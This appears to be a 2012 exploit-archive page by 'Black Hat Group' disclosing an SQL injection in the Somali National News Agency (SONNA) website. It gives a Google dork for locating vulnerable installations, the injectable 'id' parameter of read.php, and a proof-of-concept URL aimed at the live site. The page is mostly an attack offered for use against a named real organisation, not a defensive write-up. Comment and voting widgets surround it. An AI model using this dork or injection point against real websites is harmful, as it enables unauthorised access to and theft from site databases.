Sonna SQL Injection

2012.06.20

Credit: Black Hat Group

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

#################################
# Exploit Title : SONNA SQL Injection
# Author : Black Hat Group
# Home : greyh4t.com & black-hg.org
# Software Link : http://sonnanews.net/en/home/
# Security Risk : High
# Version : All Version
# Dork : inurl:"All Rights Reserved. Somali National News Agency (SONNA)"
#################################
# p0c : read.php?title=unpos-regional-coordinator-tours-galmudug&id=[Sql]
#
# Example :
#
#
http://sonnanews.net/en/read.php?title=unpos-regional-coordinator-tours-galmudug&id=304'
#################################
# Special Thanks To : Net.Edit0r - A.Cr0x - 3H34N - G3n3rall - Nol1m1t
#################################

References:

http://sonnanews.net/en/home/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Sonna SQL Injection

Dork: inurl:\"All Rights Reserved. Somali National News Agency (SONNA)\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.